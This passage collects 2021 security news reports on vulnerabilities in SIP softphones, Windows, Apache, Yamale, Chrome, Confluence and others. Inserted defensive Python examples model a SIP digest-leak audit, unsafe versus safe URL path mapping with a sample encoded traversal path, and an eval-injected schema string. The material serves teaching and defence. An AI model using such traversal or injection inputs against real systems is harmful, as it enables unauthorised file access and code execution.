Softphones are essentially software-based phones that mimic desk phones and allow for making telephone calls over the Internet without the need for using dedicated hardware. At the core of the issues are the SIP services offered by the clients to connect two peers to facilitate telephony services in IP-based mobile networks.

SIP aka Session Initiation Protocol is a signaling protocol that's used to control interactive communication sessions, such as voice, video, chat and instant messaging, as well as games and virtual reality, between endpoints, in addition to defining rules that govern the establishment and termination of each session.

A typical session in SIP commences with a user agent (aka endpoint) sending an INVITE message to a peer through SIP proxies — which are used to route requests — that, when accepted on the other end by the recipient, results in the call initiator being notified, followed by the actual data flow. SIP invitations carry session parameters that allow participants to agree on a set of compatible media types.

The attack devised by SySS is what's called a SIP Digest Leak: the attacker sends a SIP INVITE message to the target softphone to negotiate a session and then answers with a "407 Proxy Authentication Required" response (SIP reuses HTTP's status codes), which signals that the request cannot be completed without valid credentials and prompts the softphone to reply with the necessary authentication data.

"With this information, the attacker is able to perform an offline password guessing attack, and, if the guessing attack is successful, obtain the plaintext password of the targeted SIP account," Abrell explained. "Therefore, this vulnerability in combination with weak passwords is a significant security issue."
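The exchange described above, as an added example that is not part of the article or of either vendor's software: a small checker that parses a constructed SIP message flow and flags digest credentials the phone sent in reply to a 407 that did not come from its provisioned proxy. The account settings, hosts, nonce and response values are constructed, and the ordering in which the caller challenges the phone's BYE is an assumption.

```python
import re
import textwrap
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Assumed account provisioning for the softphone (constructed for this example).
ACCOUNT = {"proxy": "sip.provider.example", "realm": "sip.provider.example"}


@dataclass
class SipMessage:
    start_line: str
    headers: Dict[str, str]  # header names lower-cased

    @property
    def status(self) -> Optional[int]:
        # Responses start "SIP/2.0 <code> <reason>"; requests start with a method.
        return int(self.start_line.split()[1]) if self.start_line.startswith("SIP/2.0 ") else None


def parse_sip(raw: str) -> SipMessage:
    """Parse the start line and headers of one SIP message (any body is ignored)."""
    lines = textwrap.dedent(raw).strip().splitlines()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # a blank line ends the headers; an SDP body may follow
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return SipMessage(lines[0].strip(), headers)


def digest_params(header_value: str) -> Dict[str, str]:
    """Extract the quoted parameters of a Digest challenge or credentials header."""
    return dict(re.findall(r'(\w+)="([^"]*)"', header_value))


def should_answer_challenge(peer: str, realm: str, account: Dict[str, str]) -> bool:
    """Client-side policy: answer a 407 only from the provisioned proxy, for our realm."""
    return peer == account["proxy"] and realm == account["realm"]


@dataclass
class Finding:
    challenger: str  # host that issued the 407
    realm: str
    username: str    # account whose digest response left the phone


def audit_session(flow: List[Tuple[str, str, str]], account: Dict[str, str]) -> List[Finding]:
    """Flag digest credentials the phone sent in reply to an untrusted 407.

    flow is a list of (direction, peer_host, raw_message) as seen on the wire,
    direction being "in" (towards the phone) or "out" (from the phone).
    """
    findings: List[Finding] = []
    untrusted: Optional[Tuple[str, str]] = None
    for direction, peer, raw in flow:
        msg = parse_sip(raw)
        if direction == "in" and msg.status == 407:
            realm = digest_params(msg.headers.get("proxy-authenticate", "")).get("realm", "")
            untrusted = None if should_answer_challenge(peer, realm, account) else (peer, realm)
        elif direction == "out" and "proxy-authorization" in msg.headers and untrusted:
            creds = digest_params(msg.headers["proxy-authorization"])
            findings.append(Finding(untrusted[0], untrusted[1], creds.get("username", "")))
            untrusted = None
    return findings


# Constructed flow: an unknown host calls the phone, the call is torn down, and
# the caller answers the phone's BYE with a 407 that spoofs the account's real realm.
FLOW = [
    ("in", "198.51.100.77", """
        INVITE sip:alice@203.0.113.10 SIP/2.0
        Via: SIP/2.0/UDP 198.51.100.77:5060;branch=z9hG4bK-1
        From: <sip:caller@198.51.100.77>;tag=ac1
        To: <sip:alice@203.0.113.10>
        Call-ID: 1@198.51.100.77
        CSeq: 1 INVITE
    """),
    ("out", "198.51.100.77", """
        SIP/2.0 200 OK
        Call-ID: 1@198.51.100.77
        CSeq: 1 INVITE
    """),
    ("out", "198.51.100.77", """
        BYE sip:caller@198.51.100.77 SIP/2.0
        Call-ID: 1@198.51.100.77
        CSeq: 2 BYE
    """),
    ("in", "198.51.100.77", """
        SIP/2.0 407 Proxy Authentication Required
        Proxy-Authenticate: Digest realm="sip.provider.example", nonce="c0ffee01", algorithm=MD5
        Call-ID: 1@198.51.100.77
        CSeq: 2 BYE
    """),
    ("out", "198.51.100.77", """
        BYE sip:caller@198.51.100.77 SIP/2.0
        Proxy-Authorization: Digest username="alice", realm="sip.provider.example", nonce="c0ffee01", uri="sip:caller@198.51.100.77", response="00112233445566778899aabbccddeeff"
        Call-ID: 1@198.51.100.77
        CSeq: 3 BYE
    """),
]
```

The realm in the forged challenge matches the account's real realm, so the realm check alone would not have stopped the phone; it is the source check in should_answer_challenge that marks the challenge as untrusted.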

Also discovered is a NULL pointer dereference vulnerability in the Linphone SIP stack that could be triggered by an unauthenticated remote attacker by sending a specially crafted SIP INVITE request that could crash the softphone. "A missing tag parameter in the From header causes a crash of the SIP stack of Linphone," Abrell said.

The disclosure is the second time a NULL pointer dereference vulnerability has been discovered in the Linphone SIP client. In September 2021, Claroty made public details of a zero-click flaw in the protocol stack (CVE-2021-33056) that could be remotely exploited without any action from a victim to crash the SIP client and cause a denial-of-service (DoS) condition.

"The security level of SIP stacks still needs improvement," Abrell said, calling for a defense-in-depth approach that entails "defining and implementing appropriate security measures for the secure operation of unified communication systems."


Update Your Windows PCs Immediately to Patch New 0-Day Under Active Attack
13.10.21 
Vulnerability  Thehackernews
Microsoft on Tuesday rolled out security patches to contain a total of 71 vulnerabilities in Microsoft Windows and other software, including a fix for an actively exploited privilege escalation vulnerability that could be exploited in conjunction with remote code execution bugs to take control over vulnerable systems.

Two of the addressed security flaws are rated Critical, 68 are rated Important, and one is rated Low in severity, with three of the issues listed as publicly known at the time of the release. The four zero-days are as follows —

CVE-2021-40449 (CVSS score: 7.8) - Win32k Elevation of Privilege Vulnerability
CVE-2021-41335 (CVSS score: 7.8) - Windows Kernel Elevation of Privilege Vulnerability
CVE-2021-40469 (CVSS score: 7.2) - Windows DNS Server Remote Code Execution Vulnerability
CVE-2021-41338 (CVSS score: 5.5) - Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability
At the top of the list is CVE-2021-40449, a use-after-free vulnerability in the Win32k kernel driver discovered by Kaspersky as being exploited in the wild in late August and early September 2021 as part of a widespread espionage campaign targeting IT companies, defense contractors, and diplomatic entities. The Russian cybersecurity firm dubbed the threat cluster "MysterySnail."

"Code similarity and re-use of C2 [command-and-control] infrastructure we discovered allowed us to connect these attacks with the actor known as IronHusky and Chinese-speaking APT activity dating back to 2012," Kaspersky researchers Boris Larin and Costin Raiu said in a technical write-up, with the infection chains leading to the deployment of a remote access trojan capable of collecting and exfiltrating system information from compromised hosts before reaching out to its C2 server for further instructions.

Other bugs of note include remote code execution vulnerabilities affecting Microsoft Exchange Server (CVE-2021-26427), Windows Hyper-V (CVE-2021-38672 and CVE-2021-40461), SharePoint Server (CVE-2021-40487 and CVE-2021-41344), and Microsoft Word (CVE-2021-40486) as well as an information disclosure flaw in Rich Text Edit Control (CVE-2021-40454).

CVE-2021-26427, which has a CVSS score of 9.0 and was identified by the U.S. National Security Agency, underscores that "Exchange servers are high-value targets for hackers looking to penetrate business networks," Bharat Jogi, senior manager of vulnerability and threat research at Qualys, said.

The October Patch Tuesday is rounded out by fixes for two newly discovered shortcomings in the Print Spooler component — CVE-2021-41332, an information disclosure bug, and CVE-2021-36970, a spoofing vulnerability that has been tagged with an "Exploitation More Likely" exploitability index assessment.

"A spoofing vulnerability usually indicates that an attacker can impersonate or identify as another user," security researcher ollypwn noted in a Twitter thread. "In this case, it looks like an attacker can abuse the Spooler service to upload arbitrary files to other servers."


Digital Signature Spoofing Flaws Uncovered in OpenOffice and LibreOffice
13.10.21 
Vulnerability  Thehackernews
The maintainers of LibreOffice and OpenOffice have shipped security updates to their productivity software to remediate multiple vulnerabilities that could be weaponized by malicious actors to alter documents to make them appear as if they are digitally signed by a trusted source.

The list of the three flaws is as follows —

CVE-2021-41830 / CVE-2021-25633 - Content and Macro Manipulation with Double Certificate Attack
CVE-2021-41831 / CVE-2021-25634 - Timestamp Manipulation with Signature Wrapping
CVE-2021-41832 / CVE-2021-25635 - Content Manipulation with Certificate Validation Attack
Successful exploitation of the vulnerabilities could permit an attacker to manipulate the timestamp of signed ODF documents, and worse, alter the contents of a document or self-sign a document with an untrusted signature, which is then tweaked to change the signature algorithm to an invalid or unknown algorithm.

Both of the latter two attack scenarios stem from improper certificate validation: LibreOffice incorrectly displays a validly-signed indicator suggesting that the document hasn't been tampered with since signing, and presents a signature with an unknown algorithm as a legitimate signature issued by a trusted party.

The weaknesses have been fixed in OpenOffice version 4.1.11 and LibreOffice versions 7.0.5, 7.0.6, 7.1.1 as well as 7.1.2. The Chair for Network and Data Security (NDS) at the Ruhr-University Bochum has been credited with discovering and reporting all three issues.

The findings are the latest in a series of flaws uncovered by the Ruhr-University Bochum researchers and follow similar attack techniques disclosed earlier this year that could potentially enable an adversary to modify a certified PDF document's visible content by displaying malicious content over the certified content without invalidating its signature.

Users of LibreOffice and OpenOffice are advised to update to the latest version to mitigate the risk associated with the flaws.


GitHub Revoked Insecure SSH Keys Generated by a Popular git Client
13.10.21 
Vulnerability  Thehackernews
Code hosting platform GitHub has revoked weak SSH authentication keys that were generated via the GitKraken git GUI client due to a vulnerability in a third-party library that increased the likelihood of duplicated SSH keys.

As an added precautionary measure, the Microsoft-owned company also said it's building safeguards to prevent vulnerable versions of GitKraken from adding newly generated weak keys.

The problematic dependency, called "keypair," is an open-source SSH key generation library that allows users to create RSA keys for authentication-related purposes. It has been found to impact GitKraken versions 7.6.x, 7.7.x, and 8.0.0, released between May 12, 2021, and September 27, 2021.

The flaw — tracked as CVE-2021-41117 (CVSS score: 8.7) — concerns a bug in the pseudo-random number generator used by the library, resulting in the creation of a weaker form of public SSH keys, which, owing to their low entropy — i.e., the measure of randomness — could boost the probability of key duplication.

"This could enable an attacker to decrypt confidential messages or gain unauthorized access to an account belonging to the victim," keypair's maintainer Julian Gruber said in an advisory published Monday. The issue has since been addressed in keypair version 1.0.4 and GitKraken version 8.0.1.

Axosoft engineer Dan Suceava has been credited with discovering the security weakness, while GitHub security engineer Kevin Jones has been acknowledged for identifying the cause and source code location of the bug. As of writing, there's no evidence the flaw was exploited in the wild to compromise accounts.

Affected users are highly recommended to review and "remove all old GitKraken-generated SSH keys stored locally" and "generate new SSH keys using GitKraken 8.0.1, or later, for each of your Git service providers" such as GitHub, GitLab, and Bitbucket, among others.

Update: Along with GitHub, Microsoft Azure DevOps, GitLab, and Atlassian Bitbucket have also initiated mass revocations of SSH keys connected to accounts where the GitKraken client was used to synchronize source code, urging users to revoke the SSH public keys and generate new keys using the updated version of the app.


New Patch Released for Actively Exploited 0-Day Apache Path Traversal to RCE Attacks
9.10.21 
Vulnerability  Thehackernews

The Apache Software Foundation on Thursday released additional security updates for its HTTP Server product to remediate what it says is an "incomplete fix" for an actively exploited path traversal and remote code execution flaw that it patched earlier this week.

The new vulnerability, tracked as CVE-2021-42013, builds upon CVE-2021-41773, a flaw that impacted Apache web servers running version 2.4.49 and involved a path normalization bug that could enable an adversary to access and view arbitrary files stored on a vulnerable server.

Although the flaw was addressed by the maintainers in version 2.4.50, a day after the patches were released it became known that the weakness could also be abused to gain remote code execution if the "mod_cgi" module was loaded and the configuration "require all denied" was absent, prompting Apache to issue another round of emergency updates.

"It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives," the company noted in an advisory. "If files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution."
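The order in which a server decodes and normalizes a URL path decides whether an encoded dot segment can climb out of an aliased directory. The following is an added example of that bug class, not Apache's own code: a model of alias mapping in the broken order (normalize the encoded path, decode afterwards) beside the safe order (decode, normalize, then confine the result to the alias root). The alias table and file names are constructed.

```python
import posixpath
from typing import Dict, Optional
from urllib.parse import unquote

# Constructed Alias-style mappings from URL prefixes to filesystem directories.
ALIASES: Dict[str, str] = {
    "/icons/": "/var/www/icons/",
    "/cgi-bin/": "/usr/lib/cgi-bin/",
}


def map_url_unsafe(url_path: str, aliases: Dict[str, str]) -> Optional[str]:
    """Normalize the *encoded* path first and decode later (the broken order).

    Percent-encoded dot segments are not dots yet when the path is normalized,
    so they survive into the filesystem path and climb out of the alias
    directory once decoded.
    """
    normalized = posixpath.normpath(url_path)
    for prefix, root in aliases.items():
        if normalized.startswith(prefix):
            # The filesystem resolves the "../" produced by decoding.
            return posixpath.normpath(root + unquote(normalized[len(prefix):]))
    return None


def map_url_safe(url_path: str, aliases: Dict[str, str]) -> Optional[str]:
    """Decode, then normalize, then confine the result to the alias root."""
    normalized = posixpath.normpath(unquote(url_path))
    for prefix, root in aliases.items():
        if normalized.startswith(prefix):
            target = posixpath.normpath(root + normalized[len(prefix):])
            # Refuse anything that resolves outside the root; this is the role
            # the default 'require all denied' plays for directories outside
            # the configured document root and aliases.
            return target if target.startswith(root) else None
    return None  # not under any alias; left to the document-root handling


if __name__ == "__main__":
    for path in ("/icons/apache_pb.gif", "/icons/sub/%2e%2e/apache_pb.gif",
                 "/icons/%2e%2e/%2e%2e/%2e%2e/etc/hostname"):
        print(path, "->", map_url_unsafe(path, ALIASES), "|", map_url_safe(path, ALIASES))
```

The encoded traversal path resolves to /etc/hostname under the broken order and is rejected under the safe order, while a legitimate encoded dot segment that stays inside the alias directory still maps correctly.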

Apache credited Juan Escobar from Dreamlab Technologies, Fernando Muñoz from NULL Life CTF Team, and Shungo Kumasaka for reporting the vulnerability. In light of active exploitation, users are highly recommended to update to the latest version (2.4.51) to mitigate the risk associated with the flaw.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) said it's "seeing ongoing scanning of vulnerable systems, which is expected to accelerate, likely leading to exploitation," urging "organizations to patch immediately if they haven't already."


Code Execution Bug Affects Yamale Python Package — Used by Over 200 Projects
9.10.21 
Vulnerability  Thehackernews

A high-severity code injection vulnerability has been disclosed in 23andMe's Yamale, a schema and validator for YAML, that could be trivially exploited by adversaries to execute arbitrary Python code.

The flaw, tracked as CVE-2021-38305 (CVSS score: 7.8), involves manipulating the schema file provided as input to the tool to circumvent protections and achieve code execution. Specifically, the issue resides in the schema parsing function, which allows any input passed to it to be evaluated and executed, resulting in a scenario where a specially-crafted string within the schema can be abused for the injection of system commands.

Yamale is a Python package that allows developers to validate YAML — a data serialization language often used for writing configuration files — from the command line. The package is used by at least 224 repositories on GitHub.

"This gap allows attackers that can provide an input schema file to perform Python code injection that leads to code execution with the privileges of the Yamale process," JFrog Security CTO Asaf Karas said in an emailed statement to The Hacker News. "We recommend sanitizing any input going to eval() extensively and — preferably — replacing eval() calls with more specific APIs required for your task."

Following responsible disclosure, the issue has been rectified in Yamale version 3.0.8. "This release fixes a bug where a well-formed schema file can execute arbitrary code on the system running Yamale," the maintainers of Yamale noted in the release notes published on August 4.
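The advice to replace eval() with more specific APIs, worked through on a schema syntax modelled on Yamale's (str(min=1), int(min=0, max=150), any(str(), int())). This is an added example, not Yamale's code or its actual fix: an eval()-based parser beside an ast-based one that accepts only whitelisted validator calls with literal arguments; the validator constructors, SchemaError class, and the schema and document are constructed for the example.

```python
import ast
from typing import Any, Callable, Dict, List, Optional

Validator = Callable[[Any], bool]


class SchemaError(ValueError):
    """Raised when a schema expression is not a whitelisted validator call."""


# Minimal validator constructors modelled on the Yamale schema syntax
# (assumed for this example, not Yamale's own implementation).
def make_str(min: Optional[int] = None, max: Optional[int] = None) -> Validator:
    return lambda v: isinstance(v, str) and (min is None or len(v) >= min) and (max is None or len(v) <= max)


def make_int(min: Optional[int] = None, max: Optional[int] = None) -> Validator:
    return lambda v: (isinstance(v, int) and not isinstance(v, bool)
                      and (min is None or v >= min) and (max is None or v <= max))


def make_any(*alternatives: Validator) -> Validator:
    return lambda v: any(check(v) for check in alternatives)


VALIDATORS: Dict[str, Callable[..., Validator]] = {"str": make_str, "int": make_int, "any": make_any}


def parse_validator_unsafe(expr: str) -> Any:
    # The eval() pattern: whatever Python the schema author wrote is executed,
    # so a schema file is as powerful as a script run with the tool's privileges.
    return eval(expr, {"str": make_str, "int": make_int, "any": make_any})


def parse_validator_safe(expr: str) -> Validator:
    # Parse to an AST and build the validator from it; nothing in the schema
    # is executed, only recognised constructor calls are instantiated.
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError as exc:
        raise SchemaError(f"cannot parse schema expression {expr!r}") from exc
    return _build(tree.body)


def _build(node: ast.AST) -> Validator:
    if not (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)):
        raise SchemaError(f"expected a validator call, got {type(node).__name__}")
    if node.func.id not in VALIDATORS:
        raise SchemaError(f"unknown validator {node.func.id!r}")
    if any(kw.arg is None for kw in node.keywords):
        raise SchemaError("**kwargs expansion is not allowed in schemas")
    args = [_argument(a) for a in node.args]
    kwargs = {kw.arg: _argument(kw.value) for kw in node.keywords}
    return VALIDATORS[node.func.id](*args, **kwargs)


def _argument(node: ast.AST) -> Any:
    if isinstance(node, ast.Call):
        return _build(node)            # nested validators, e.g. any(str(), int())
    try:
        return ast.literal_eval(node)  # numbers, strings, lists; no names, no calls
    except ValueError as exc:
        raise SchemaError(f"non-literal argument: {ast.dump(node)}") from exc


def is_accepted(expr: str) -> bool:
    """True if the safe parser accepts the schema expression."""
    try:
        parse_validator_safe(expr)
        return True
    except SchemaError:
        return False


def validate(schema: Dict[str, str], data: Dict[str, Any]) -> List[str]:
    """Return the keys whose values fail their (safely parsed) validators."""
    return [key for key, expr in schema.items() if not parse_validator_safe(expr)(data.get(key))]


# Constructed example schema and document.
SCHEMA = {"name": "str(min=1)", "age": "int(min=0, max=150)", "id": "any(str(), int())"}
DOCUMENT = {"name": "", "age": 42, "id": 7}
```

With the eval()-based parser, a schema entry such as __import__('os').getcwd() simply runs; the AST-based parser rejects it, as well as any call that is not one of the three validators, before anything executes.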

The findings are the latest in a series of security issues uncovered by JFrog in Python packages. In June 2021, Vdoo disclosed typosquatted packages in the PyPI repository that were found to download and execute third-party cryptominers such as T-Rex, ubqminer, or PhoenixMiner for mining Ethereum and Ubiq on compromised systems.

Subsequently, the JFrog security team discovered eight more malicious Python libraries, which were downloaded no fewer than 30,000 times, that could have been leveraged to execute remote code on the target machine, gather system information, siphon credit card information and passwords auto-saved in Chrome and Edge browsers, and even steal Discord authentication tokens.

"Software package repositories are becoming a popular target for supply chain attacks and there have been malware attacks on popular repositories like npm, PyPI, and RubyGems," the researchers said. "Sometimes malware packages are allowed to be uploaded to the package repository, giving malicious actors the opportunity to use repositories to distribute viruses and launch successful attacks on both developer and CI/CD machines in the pipeline."


Multiple Critical Flaws Discovered in Honeywell Experion PKS and ACE Controllers
9.10.21 
Vulnerability  Thehackernews

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released an advisory regarding multiple security vulnerabilities affecting all versions of Honeywell Experion Process Knowledge System C200, C200E, C300, and ACE controllers that could be exploited to achieve remote code execution and denial-of-service (DoS) conditions.

"A Control Component Library (CCL) may be modified by a bad actor and loaded to a controller such that malicious code is executed by the controller," Honeywell noted in an independent security notification published earlier this February. Credited with discovering and reporting the flaws are Rei Henigman and Nadav Erez of industrial cybersecurity firm Claroty.

Experion Process Knowledge System (PKS) is a distributed control system (DCS) that's designed to control large industrial processes spanning a variety of sectors ranging from petrochemical refineries to nuclear power plants where high reliability and security is important.

The list of three flaws is as follows -

CVE-2021-38397 (CVSS score: 10.0) - Unrestricted Upload of File with Dangerous Type
CVE-2021-38395 (CVSS score: 9.1) - Improper Neutralization of Special Elements in Output Used by a Downstream Component
CVE-2021-38399 (CVSS score: 7.5) - Relative Path Traversal
According to Claroty, the issues hinge on the download code procedure that's essential to program the logic running in the controller, thus enabling an attacker to mimic the process and upload arbitrary CCL binary files. "The device then loads the executables without performing checks or sanitization, giving an attacker the ability to upload executables and run unauthorized native code remotely without authentication," researchers Henigman and Erez said.

In a nutshell, successful exploitation of the shortcomings could permit a malicious party to access unauthorized files and directories, and worse, remotely execute arbitrary code and cause a denial-of-service condition. To prevent loading a modified CCL with malicious code to a controller, Honeywell has incorporated additional security enhancements by cryptographically signing each CCL binary that's validated prior to its use.

Users are urged to update or patch as soon as possible in order to mitigate these vulnerabilities fully.


Apache Warns of Zero-Day Exploit in the Wild — Patch Your Web Servers Now!
9.10.21 
Vulnerability  Thehackernews

Apache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild.

"A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root," the open-source project maintainers noted in an advisory published Tuesday.

"If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts."

The flaw, tracked as CVE-2021-41773, affects only Apache HTTP server version 2.4.49. Ash Daulton and cPanel Security Team have been credited with discovering and reporting the issue on September 29, 2021.

Source: PT SWARM
Also resolved by Apache is a null pointer dereference vulnerability observed while processing HTTP/2 requests (CVE-2021-41524), which could allow an adversary to perform a denial-of-service (DoS) attack on the server. The non-profit corporation said the weakness was introduced in version 2.4.49.

Apache users are highly recommended to patch as soon as possible to contain the path traversal vulnerability and mitigate any risk associated with active exploitation of the flaw.

Update: Path Traversal Zero-Day in Apache Leads to RCE Attacks
The actively exploited Apache HTTP server zero-day flaw is far more critical than previously thought, with new proof-of-concept (PoC) exploits indicating that the vulnerability goes beyond path traversal to equip attackers with remote code execution (RCE) abilities. Security researcher Hacker Fantastic, on Twitter, noted that the vulnerability is "in fact also RCE providing mod-cgi is enabled."

Will Dormann, vulnerability analyst at CERT/CC, corroborated the findings, adding "I was not doing anything clever other than just reproducing essentially the public PoC on Windows when I saw calc.exe spawn."


Update Google Chrome ASAP to Patch 2 New Actively Exploited Zero-Day Flaws
6.10.21 
Vulnerability  Thehackernews
Google on Thursday pushed urgent security fixes for its Chrome browser, including a pair of new security weaknesses that the company said are being exploited in the wild, making them the fourth and fifth actively exploited zero-days plugged this month alone.

The issues, designated as CVE-2021-37975 and CVE-2021-37976, are part of a total of four patches, and concern a use-after-free flaw in the V8 JavaScript and WebAssembly engine as well as an information leak in core.

As is usually the case, the tech giant has refrained from sharing any additional details regarding how these zero-day vulnerabilities were used in attacks so as to allow a majority of users to be updated with the patches, but noted that it's aware that "exploits for CVE-2021-37975 and CVE-2021-37976 exist in the wild."

An anonymous researcher has been credited with reporting CVE-2021-37975. The discovery of CVE-2021-37976, on the other hand, involves Clément Lecigne from Google Threat Analysis Group, who was also credited with CVE-2021-37973, another actively exploited use-after-free vulnerability in Chrome's Portals API that was reported last week, raising the possibility that the two flaws may have been strung together as part of an exploit chain to execute arbitrary code.

With the latest update, Google has addressed a record 14 zero-days in the web browser since the start of the year.

CVE-2021-21148 - Heap buffer overflow in V8
CVE-2021-21166 - Object recycle issue in audio
CVE-2021-21193 - Use-after-free in Blink
CVE-2021-21206 - Use-after-free in Blink
CVE-2021-21220 - Insufficient validation of untrusted input in V8 for x86_64
CVE-2021-21224 - Type confusion in V8
CVE-2021-30551 - Type confusion in V8
CVE-2021-30554 - Use-after-free in WebGL
CVE-2021-30563 - Type confusion in V8
CVE-2021-30632 - Out of bounds write in V8
CVE-2021-30633 - Use-after-free in Indexed DB API
CVE-2021-37973 - Use-after-free in Portals
Chrome users are advised to update to the latest version (94.0.4606.71) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate any potential risk of active exploitation.


Atlassian Confluence RCE Flaw Abused in Multiple Cyberattack Campaigns
6.10.21 
Vulnerability  Thehackernews
Opportunistic threat actors have been found actively exploiting a recently disclosed critical security flaw in Atlassian Confluence deployments across Windows and Linux to deploy web shells that result in the execution of crypto miners on compromised systems.

Tracked as CVE-2021-26084 (CVSS score: 9.8), the vulnerability concerns an OGNL (Object-Graph Navigation Language) injection flaw that could be exploited to achieve arbitrary code execution on a Confluence Server or Data Center instance.

"A remote attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious parameter to a vulnerable server," researchers from Trend Micro noted in a technical write-up detailing the weakness. "Successful exploitation can result in arbitrary code execution in the security context of the affected server."

The vulnerability, which resides in the Webwork module of Atlassian Confluence Server and Data Center, stems from an insufficient validation of user-supplied input, causing the parser to evaluate rogue commands injected within the OGNL expressions.

The in-the-wild attacks come after the U.S. Cyber Command warned of mass exploitation attempts following the vulnerability's public disclosure in late August this year.

In one such attack observed by Trend Micro, z0Miner, a trojan and cryptojacker, was found updated to leverage the remote code execution (RCE) flaw to distribute next-stage payloads that act as a channel to maintain persistence and deploy cryptocurrency mining software on the machines. Imperva, in an independent analysis, corroborated the findings, uncovering similar intrusion attempts that were aimed at running the XMRig cryptocurrency miner and other post-exploitation scripts.

Also detected by Imperva, Juniper, and Lacework is exploitation activity conducted by Muhstik, a China-linked botnet known for its wormlike self-propagating capability to infect Linux servers and IoT devices since at least 2018.

Furthermore, Palo Alto Networks' Unit 42 threat intelligence team said it identified and prevented attacks that were orchestrated to upload its customers' password files as well as download malware-laced scripts that dropped a miner and even open an interactive reverse shell on the machine.

"As is often the case with RCE vulnerabilities, attackers will rush and exploit affected systems for their own gain," Imperva researchers said. "RCE vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target."


Urgent Chrome Update Released to Patch Actively Exploited Zero-Day Vulnerability
6.10.21 
Vulnerability  Thehackernews
Google on Friday rolled out an emergency security patch to its Chrome web browser to address a security flaw that's known to have an exploit in the wild.

Tracked as CVE-2021-37973, the vulnerability has been described as a use-after-free in the Portals API, a web page navigation system that enables a page to show another page as an inset and "perform a seamless transition to a new state, where the formerly-inset page becomes the top-level document."

Clément Lecigne of Google Threat Analysis Group (TAG) has been credited with reporting the flaw. Additional specifics pertaining to the weakness have not been disclosed in light of active exploitation and to allow a majority of the users to apply the patch, but the internet giant said it's "aware that an exploit for CVE-2021-37973 exists in the wild."

The update arrives a day after Apple moved to close an actively exploited security hole in older versions of iOS and macOS (CVE-2021-30869), which the TAG noted as being "used in conjunction with an N-day remote code execution targeting WebKit." With the latest fix, Google has addressed a total of 12 zero-day flaws in Chrome since the start of 2021:

CVE-2021-21148 - Heap buffer overflow in V8
CVE-2021-21166 - Object recycle issue in audio
CVE-2021-21193 - Use-after-free in Blink
CVE-2021-21206 - Use-after-free in Blink
CVE-2021-21220 - Insufficient validation of untrusted input in V8 for x86_64
CVE-2021-21224 - Type confusion in V8
CVE-2021-30551 - Type confusion in V8
CVE-2021-30554 - Use-after-free in WebGL
CVE-2021-30563 - Type confusion in V8
CVE-2021-30632 - Out of bounds write in V8
CVE-2021-30633 - Use-after-free in Indexed DB API
Chrome users are advised to update to the latest version (94.0.4606.61) for Windows, Mac, and Linux by heading to Settings > Help > 'About Google Chrome' to mitigate the risk associated with the flaw.


SonicWall Issues Patches for a New Critical Flaw in SMA 100 Series Devices
6.10.21 
Vulnerability  Thehackernews
Network security company SonicWall has addressed a critical security vulnerability affecting its Secure Mobile Access (SMA) 100 series appliances that could permit remote, unauthenticated attackers to gain administrator access on targeted devices.

Tracked as CVE-2021-20034, the arbitrary file deletion flaw is rated 9.1 out of a maximum of 10 on the CVSS scoring system, and could allow an adversary to bypass path traversal checks and delete any file, causing the devices to reboot to factory default settings.

"The vulnerability is due to an improper limitation of a file path to a restricted directory potentially leading to arbitrary file deletion as 'nobody,'" the San Jose-based firm noted in an advisory published Thursday. "There is no evidence that this vulnerability is being exploited in the wild."

SonicWall credited Wenxu Yin of Alpha Lab, Qihoo 360, with reporting the security shortcoming, which impacts SMA 100 Series — SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v — running the following versions:

9.0.0.10-28sv and earlier
10.2.0.7-34sv and earlier
10.2.1.0-17sv and earlier
Given that there are no workarounds to remediate the attack vector and SonicWall devices have become a lucrative target for threat actors to deploy ransomware in recent months, customers are advised to implement applicable patches as soon as possible to mitigate any potential exploitation risk.


Cisco Releases Patches for 3 New Critical Flaws Affecting IOS XE Software
6.10.21 
Vulnerability  Thehackernews
Networking equipment maker Cisco Systems has rolled out patches to address three critical security vulnerabilities in its IOS XE network operating system that remote attackers could potentially abuse to execute arbitrary code with administrative privileges and trigger a denial-of-service (DoS) condition on vulnerable devices.

The list of three flaws is as follows -

CVE-2021-34770 (CVSS score: 10.0) - Cisco IOS XE Software for Catalyst 9000 Family Wireless Controllers CAPWAP Remote Code Execution Vulnerability
CVE-2021-34727 (CVSS score: 9.8) - Cisco IOS XE SD-WAN Software Buffer Overflow Vulnerability
CVE-2021-1619 (CVSS score: 9.8) - Cisco IOS XE Software NETCONF and RESTCONF Authentication Bypass Vulnerability
The most severe of the issues is CVE-2021-34770, which Cisco calls a "logic error" that occurs during the processing of CAPWAP (Control And Provisioning of Wireless Access Points) packets, the protocol that lets a central wireless controller manage a group of wireless access points.

"An attacker could exploit this vulnerability by sending a crafted CAPWAP packet to an affected device," the company noted in its advisory. "A successful exploit could allow the attacker to execute arbitrary code with administrative privileges or cause the affected device to crash and reload, resulting in a DoS condition."

CVE-2021-34727, on the other hand, concerns an insufficient bounds check when accepting incoming network traffic to the device, thus allowing an attacker to transmit specially-crafted traffic that could result in the execution of arbitrary code with root-level privileges or cause the device to reload. 1000 Series Integrated Services Routers (ISRs), 4000 Series ISRs, ASR 1000 Series Aggregation Services Routers, and Cloud Services Router 1000V Series that have the SD-WAN feature enabled are impacted by the flaw.

